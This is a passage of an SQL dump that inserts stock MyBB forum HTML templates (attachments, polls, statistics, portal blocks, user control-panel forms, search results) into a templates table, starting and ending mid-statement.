/>\n<fieldset>\n<legend><strong>{$lang->postbit_attachments}</strong></legend>\n{$post[\'attachedthumbs\']}\n{$post[\'attachedimages\']}\n{$post[\'attachmentlist\']}\n</fieldset>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('268', 'postbit_attachments_attachment', '<br />{$attachment[\'icon\']}&nbsp;&nbsp;<a href=\"attachment.php?aid={$attachment[\'aid\']}\" target=\"_blank\">{$attachment[\'filename\']}</a> ({$lang->postbit_attachment_size} {$attachment[\'filesize\']} / {$lang->postbit_attachment_downloads} {$attachment[\'downloads\']})', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('269', 'postbit_attachments_attachment_unapproved', '<br /><strong>{$postbit_unapproved_attachments}</strong>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('270', 'postbit_attachments_images', '<span class=\"smalltext\"><strong>{$lang->postbit_attachments_images}</strong></span><br />\n{$post[\'imagelist\']}\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('271', 'post_attachments_attachment_postinsert', '<input type=\"button\" class=\"button\" name=\"insert\" value=\"{$lang->insert_attachment_post}\" onclick=\"clickableEditor.insertAttachment({$attachment[\'aid\']});\" />', '-2', '1405', '', '1339729416'); INSERT INTO mybb_templates VALUES('272', 'post_attachments_attachment_remove', '<input type=\"submit\" class=\"button\" name=\"rem\" value=\"{$lang->remove_attachment}\" onclick=\"return Post.removeAttachment({$attachment[\'aid\']});\" />', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('273', 'post_attachments_update', '<input type=\"submit\" class=\"button\" name=\"updateattachment\" value=\"{$lang->update_attachment}\" tabindex=\"12\" />', '-2', '1604', '', '1339729416'); INSERT INTO mybb_templates VALUES('274', 'moderation_mergeposts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->merge_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"><tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_posts}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\">{$lang->merge_posts_note}</td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->post_separator}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" colspan=\"2\"><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"hr\" checked=\"checked\" /> {$lang->horizontal_rule}</label><br /><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"new_line\" /> {$lang->new_line}</label></td>\n</tr>\n{$posts}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_posts}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_mergeposts\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('275', 'moderation_mergeposts_post', '<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->posted_by} {$post[\'username\']} - {$postdate} {$posttime}</strong></span></td>\n</tr>\n<tr>\n<td class=\"{$altbg}\" valign=\"top\" align=\"center\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" checked=\"checked\" name=\"mergepost[{$post[\'pid\']}]\" value=\"1\" /></td>\n<td class=\"{$altbg}\">{$message}</td>\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('276', 'stats', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->board_stats}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->board_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->totals}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->averages}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">\n{$lang->posts} <strong>{$stats[\'numposts\']}</strong><br />\n{$lang->threads} <strong>{$stats[\'numthreads\']}</strong><br />\n{$lang->members} <strong>{$stats[\'numusers\']}</strong>\n</td>\n<td class=\"trow1\" rowspan=\"3\" valign=\"top\">\n{$lang->ppd} <strong>{$postsperday}</strong><br />\n{$lang->tpd} <strong>{$threadsperday}</strong><br />\n{$lang->mpd} <strong>{$membersperday}</strong><br />\n{$lang->ppm} <strong>{$postspermember}</strong><br />\n{$lang->rpt} <strong>{$repliesperthread}</strong>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\" valign=\"top\"><strong>{$lang->general}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n{$lang->newest_member} {$stats[\'newest_user\']}<br />\n{$lang->members_posted} <strong>{$havepostedpercent}</strong><br />\n{$lang->todays_top_poster}<br />\n{$lang->popular_forum}\n</td>\n</tr>\n</table>\n\n\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->most_popular}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_replied_threads}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->most_viewed_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">{$mostreplies}</td>\n<td class=\"trow1\" valign=\"top\">{$mostviews}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('277', 'polls_newpoll', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->post_new_poll}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$preview}\n<form action=\"polls.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->post_new_poll}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->question}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"question\" size=\"40\" maxlength=\"240\" value=\"{$question}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->num_options}</strong><br /><span class=\"smalltext\">{$lang->max_options} {$mybb->settings[\'maxpolloptions\']}</span></td>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" name=\"polloptions\" size=\"10\" value=\"{$polloptions}\" />&nbsp;<input type=\"submit\" class=\"button\" name=\"updateoptions\" value=\"{$lang->update_options}\" /></td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_options}</strong></td>\n<td class=\"trow2\"><span class=\"smalltext\">{$lang->poll_options_note}</span>\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n{$optionbits}\n</table>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\"><strong>{$lang->options}</strong></td>\n<td class=\"trow1\"><span class=\"smalltext\">\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[multiple]\" value=\"1\" {$postoptionschecked[\'multiple\']} />&nbsp;{$lang->option_multiple}</label><br />\n<label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[public]\" value=\"1\" {$postoptionschecked[\'public\']} />&nbsp;{$lang->option_public}</label>\n</span>\n</td>\n</tr>\n<tr>\n<td class=\"trow2\" valign=\"top\"><strong>{$lang->poll_timeout}</strong><br /><span class=\"smalltext\">{$lang->timeout_note}</span></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"timeout\" value=\"{$timeout}\" /> {$lang->days}</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->post_new_poll}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_newpoll\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('278', 'member_register_agreement', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->agreement}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->agreement}</strong></td>\n</tr>\n{$coppa_agreement}\n<tr>\n<td class=\"trow1\">\n<p>{$lang->agreement_1}</p>\n<p>{$lang->agreement_2}</p>\n<p>{$lang->agreement_3}</p>\n<p>{$lang->agreement_4}</p>\n<p><strong>{$lang->agreement_5}</strong></p>\n</td>\n</tr>\n</table>\n\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"step\" value=\"agreement\" />\n<input type=\"hidden\" name=\"action\" value=\"register\" />\n<input type=\"submit\" class=\"button\" name=\"agree\" value=\"{$lang->i_agree}\" />\n</div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '123', '', '1339729416'); INSERT INTO mybb_templates VALUES('279', 'stats_thread', '<a href=\"{$thread[\'threadlink\']}\"><strong>{$thread[\'subject\']}</strong></a> ({$numberbit} {$numbertype})<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('280', 'online', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->users_online}</title>\n{$headerinclude}\n{$refresh}\n</head>\n<body>\n {$header}\n {$multipage}\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\"><strong>{$lang->users_online}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" align=\"center\"><a href=\"online.php?sortby=username\"><span class=\"smalltext\"><strong>{$lang->on_username}</strong></span></a></td>\n <td class=\"tcat\" align=\"center\"><a href=\"online.php?sortby=time\"><span class=\"smalltext\"><strong>{$lang->time}</strong></span></a></td>\n <td class=\"tcat\" width=\"50%\"><a href=\"online.php?sortby=location\"><span class=\"smalltext\"><strong>{$lang->location}</strong></span></a></td>\n </tr>\n {$online_rows}\n <tr>\n <td class=\"tfoot\" colspan=\"3\" align=\"right\"><span class=\"smalltext\"><strong><a href=\"online.php?action=today\">{$lang->online_today}</a> | <a href=\"online.php\">{$lang->refresh_page}</a></strong></span></td>\n </tr>\n </table>\n <br />\n {$multipage}\n {$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('281', 'portal_welcome_membertext', '<span class=\"smalltext\"><em>{$lang->member_welcome_lastvisit}</em> {$lastvisit}<br />\n{$lang->since_then}<br />\n<strong>&raquo;</strong> {$lang->new_announcements}<br />\n<strong>&raquo;</strong> {$lang->new_threads}<br />\n<strong>&raquo;</strong> {$lang->new_posts}<br /><br />\n<a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getnew\">{$lang->view_new}</a><br /><a href=\"{$mybb->settings[\'bburl\']}/search.php?action=getdaily\">{$lang->view_todays}</a>\n</span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('282', 'portal', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\">\n<tr><td valign=\"top\" width=\"200\">\n{$welcome}\n{$pms}\n{$search}\n{$stats}\n{$whosonline}\n{$latestthreads}\n</td>\n<td>&nbsp;</td>\n<td valign=\"top\">\n{$announcements}\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '127', '', '1339729416'); INSERT INTO mybb_templates VALUES('283', 'portal_pms', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong><a href=\"{$mybb->settings[\'bburl\']}/private.php\">{$lang->private_messages}</a></strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<span class=\"smalltext\">{$lang->pms_received_new}<br /><br />\n<strong>&raquo; </strong> <strong>{$messages[\'pms_unread\']}</strong> {$lang->pms_unread}<br />\n<strong>&raquo; </strong> <strong>{$messages[\'pms_total\']}</strong> {$lang->pms_total}</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('284', 'portal_stats', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->forum_stats}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<span class=\"smalltext\">\n<strong>&raquo; </strong>{$lang->num_members} {$stats[\'numusers\']}<br />\n<strong>&raquo; </strong>{$lang->latest_member} {$newestmember}<br />\n<strong>&raquo; </strong>{$lang->num_threads} {$stats[\'numthreads\']}<br />\n<strong>&raquo; </strong>{$lang->num_posts} {$stats[\'numposts\']}\n<br /><br /><a href=\"{$mybb->settings[\'bburl\']}/stats.php\">{$lang->full_stats}</a>\n</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('285', 'portal_welcome', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->welcome}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n{$welcometext}\n</td>\n</tr>\n</table><br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('286', 'portal_whosonline', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->online}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<span class=\"smalltext\">\n{$lang->online_users}<br /><strong>&raquo;</strong> {$lang->online_counts}<br />{$onlinemembers}\n</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('287', 'portal_announcement_numcomments', '- <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$lang->replies}</a> ({$announcement[\'replies\']})', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('288', 'portal_announcement', '<table cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$icon} <a href=\"{$mybb->settings[\'bburl\']}/{$announcement[\'threadlink\']}\">{$announcement[\'subject\']}</a></strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" align=\"right\">\n<span class=\"smalltext\">{$lang->posted_by} {$profilelink} - {$anndate} {$anntime} {$numcomments}</span>\n</td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<table border=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\">\n <tr>\n {$avatar}\n <td class=\"trow1\">\n <p>\n {$message}\n </p>\n {$post[\'attachments\']}\n </td>\n </tr>\n <tr>\n <td align=\"right\" colspan=\"2\" valign=\"bottom\">\n <span class=\"smalltext\">\n <a href=\"{$mybb->settings[\'bburl\']}/printthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/printable.gif\" alt=\"{$lang->print_this_item}\" title=\"{$lang->print_this_item}\" /></a>&nbsp;<a href=\"{$mybb->settings[\'bburl\']}/sendthread.php?tid={$announcement[\'tid\']}\"><img src=\"{$theme[\'imgdir\']}/send.gif\" alt=\"{$lang->send_to_friend}\" title=\"{$lang->send_to_friend}\" /></a>\n </span>\n </td>\n </tr>\n</table>\n</td>\n</tr>\n</table>\n<br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('289', 'portal_announcement_numcomments_no', '- {$lang->no_replies}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('290', 'portal_search', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->search_forums}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\">\n<form method=\"post\" action=\"{$mybb->settings[\'bburl\']}/search.php\">\n<input type=\"hidden\" name=\"action\" value=\"do_search\" />\n<input type=\"hidden\" name=\"postthread\" value=\"1\" />\n<input type=\"hidden\" name=\"forums\" value=\"all\" />\n<input type=\"hidden\" name=\"showresults\" value=\"threads\" />\n<input type=\"text\" class=\"textbox\" name=\"keywords\" value=\"\" />\n{$gobutton}\n</form><br />\n<span class=\"smalltext\">\n(<a href=\"{$mybb->settings[\'bburl\']}/search.php\">{$lang->advanced_search}</a>)\n</span>\n</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('291', 'portal_latestthreads', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->latest_threads}</strong></td>\n</tr>\n{$threadlist}\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('292', 'portal_whosonline_memberbit', '{$comma}<a href=\"{$mybb->settings[\'bburl\']}/{$user[\'profilelink\']}\">{$user[\'username\']}</a>{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('293', 'printthread', '<html>\n<head>\n<title>{$thread[\'threadprefix\']} {$thread[\'subject\']} - {$lang->printable_version}</title>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" />\n<style type=\"text/css\">\nbody { font-family: Verdana, Arial, sans-serif; font-size: 13px; }\n.largetext { font-family: Verdana, Arial, sans-serif; font-size: medium; font-weight: bold; }\n</style>\n</head>\n<body>\n<table width=\"98%\" align=\"center\">\n<tr>\n<td valign=\"top\"><a href=\"index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" border=\"0\" /></a></td>\n</tr>\n<tr>\n<td>\n<span class=\"largetext\">{$thread[\'displaystyle\']} <a href=\"{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a> - {$lang->printable_version}</span><br />\n<br />\n+- {$mybb->settings[\'bbname\']} (<em>{$mybb->settings[\'bburl\']}</em>)<br />\n{$breadcrumb}\n+{$tdepth} {$lang->thread} {$thread[\'displaystyle\']} {$thread[\'subject\']} (<em>/{$thread[\'threadlink\']}</em>)<br />\n<br />\n{$multipage}</td>\n</tr>\n<tr>\n<td><br /><hr size=\"1\" />{$postrows}</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('294', 'forumdisplay_nothreads', '<tr>\n<td colspan=\"{$colspan}\" class=\"trow1\">{$lang->nothreads}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('295', 'usercp_password', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_password}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->change_password}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->current_password}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"oldpassword\" size=\"25\" /></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_password}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->new_password}</strong></td>\n<td class=\"trow2\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_password}</strong></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"password\" class=\"textbox\" name=\"password2\" size=\"25\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_password\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_password}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('296', 'usercp_email', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->change_email}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"usercp.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n{$errors}\n{$banned_email_error}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->change_email}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->enter_password}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\"><input type=\"password\" class=\"textbox\" name=\"password\" size=\"25\" /></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->please_enter_confirm_new_email}</strong></td>\n</tr>\n<tr>\n<td class=\"trow2\" width=\"40%\"><strong>{$lang->new_email}</strong></td>\n<td class=\"trow2\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" size=\"25\" maxlength=\"150\" value=\"{$email}\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->confirm_email}</strong></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email2\" size=\"25\" maxlength=\"150\" value=\"{$email2}\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\">\n<input type=\"hidden\" name=\"action\" value=\"do_email\" />\n<input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->update_email}\" />\n</div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('297', 'private_archive_txt_folderhead', '#######################################################################\n{$lang->folder} {$foldername}\n#######################################################################\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('298', 'private_archive_txt_message', '{$lang->subject} {$message[\'subject\']}\n{$tofrom} {$tofromusername}\n{$lang->sent} {$senddate}\n------------------------------------------------------------------------\n{$message[\'message\']}\n------------------------------------------------------------------------\n\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('299', 'private_archive_html_folderhead', '</table>\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->folder} {$foldername}</strong></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('300', 'private_archive_html_message', '<tr>\n<td class=\"trow1\"><strong>{$lang->subject} {$message[\'subject\']}</strong><br /><em>{$lang->to} {$message[\'tousername\']}<br />{$lang->from} {$message[\'fromusername\']}<br />{$lang->sent} {$senddate}</em></td>\n</tr>\n<tr>\n<td class=\"trow2\">{$message[\'message\']}</td>\n</tr>\n<tr>\n<td class=\"tcat\" height=\"3\"><img src=\"pixel.gif\" height=\"3\" width=\"1\" alt=\"\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('301', 'private_archive_csv_message', '{$senddate},\"{$foldername}\",\"{$message[\'subject\']}\",\"{$message[\'tousername\']}\",\"{$message[\'fromusername\']}\",\"{$message[\'message\']}\"\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('302', 'search_results_threads_thread', '<tr>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"{$folder_label}\" title=\"{$folder_label}\" /></td>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td>\n <td class=\"{$bgcolor}\">\n {$attachment_count}\n <div>\n <span>{$prefix} {$gotounread}{$thread[\'threadprefix\']}<a href=\"{$thread_link}{$highlight}\" class=\"{$inline_edit_class} {$new_class}\" id=\"tid_{$inline_edit_tid}\">{$thread[\'subject\']}</a>{$thread[\'multipage\']}</span>\n <div class=\"author smalltext\">{$thread[\'profilelink\']}</div>\n </div>\n </td>\n <td class=\"{$bgcolor}\">{$thread[\'forumlink\']}</td>\n <td align=\"center\" class=\"{$bgcolor}\"><a href=\"javascript:MyBB.whoPosted({$thread[\'tid\']});\">{$thread[\'replies\']}</a></td>\n <td align=\"center\" class=\"{$bgcolor}\">{$thread[\'views\']}</td>\n <td class=\"{$bgcolor}\" style=\"white-space: nowrap\">\n <span class=\"smalltext\">\n {$lastpostdate} {$lastposttime}<br />\n <a href=\"{$thread[\'lastpostlink\']}\">{$lang->lastpost}</a>: {$lastposterlink}\n </span>\n </td>\n {$inline_mod_checkbox}\n</tr>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('303', 'search_results_threads', '<html>\n <head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->search_results}</title>\n {$headerinclude}\n </head>\n <body>\n {$header}\n <table width=\"100%\" align=\"center\" border=\"0\">\n <tr>\n <td align=\"right\" valign=\"top\">{$multipage}</td>\n </tr>\n </table>\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td colspan=\"8\" class=\"thead\">\n <strong>{$lang->search_results}</strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" align=\"center\" colspan=\"3\" width=\"56%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=subject&amp;order=asc\">{$lang->thread}</a> {$orderarrow[\'subject\']}</strong> / <strong><a href=\"{$sorturl}&amp;sortby=starter&amp;order=asc\">{$lang->author}</a> {$orderarrow[\'starter\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"14%\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=forum&amp;order=asc\">{$lang->forum}</a> {$orderarrow[\'forum\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=replies&amp;order=desc\">{$lang->replies}</a> {$orderarrow[\'replies\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=views&amp;order=desc\">{$lang->views}</a> {$orderarrow[\'views\']}</strong></span></td>\n <td class=\"tcat\" align=\"center\" width=\"200\"><span class=\"smalltext\"><strong><a href=\"{$sorturl}&amp;sortby=lastpost&amp;order=desc\">{$lang->lastpost}</a> {$orderarrow[\'lastpost\']}</strong></span></td>\n {$inlinemodcol}\n </tr>\n {$selectall}\n {$results}\n </table>\n {$inline_edit_js}\n <table width=\"100%\" align=\"center\" border=\"0\">\n <tr>\n <td align=\"left\" valign=\"top\">{$multipage}</td>\n <td align=\"right\" valign=\"top\">{$inlinemod}</td>\n </tr>\n </table>\n {$footer}\n </body>\n </html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('304', 'search_results_posts_post', '<tr>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"\"/></td>\n <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">{$icon}</td>\n <td class=\"{$bgcolor}\">\n <span class=\"smalltext\">\n {$lang->post_thread} <a href=\"{$thread_url}{$highlight}\">{$post[\'thread_subject\']}</a><br />\n {$lang->post_subject} <a href=\"{$post_url}{$highlight}#pid{$post[\'pid\']}\">{$post[\'subject\']}</a>\n </span><br />\n <table width=\"100%\"><tr><td><span class=\"smalltext\"><em>{$prev}</em></span></td></tr></table>\n </td>\n <td align=\"center\" class=\"{$bgcolor}\">{$post[\'profilelink\']}</td>\n <td class=\"{$bgcolor}\" >{$post[\'forumlink\']}</td>\n <td align=\"center\" class=\"{$bgcolor}\"><a 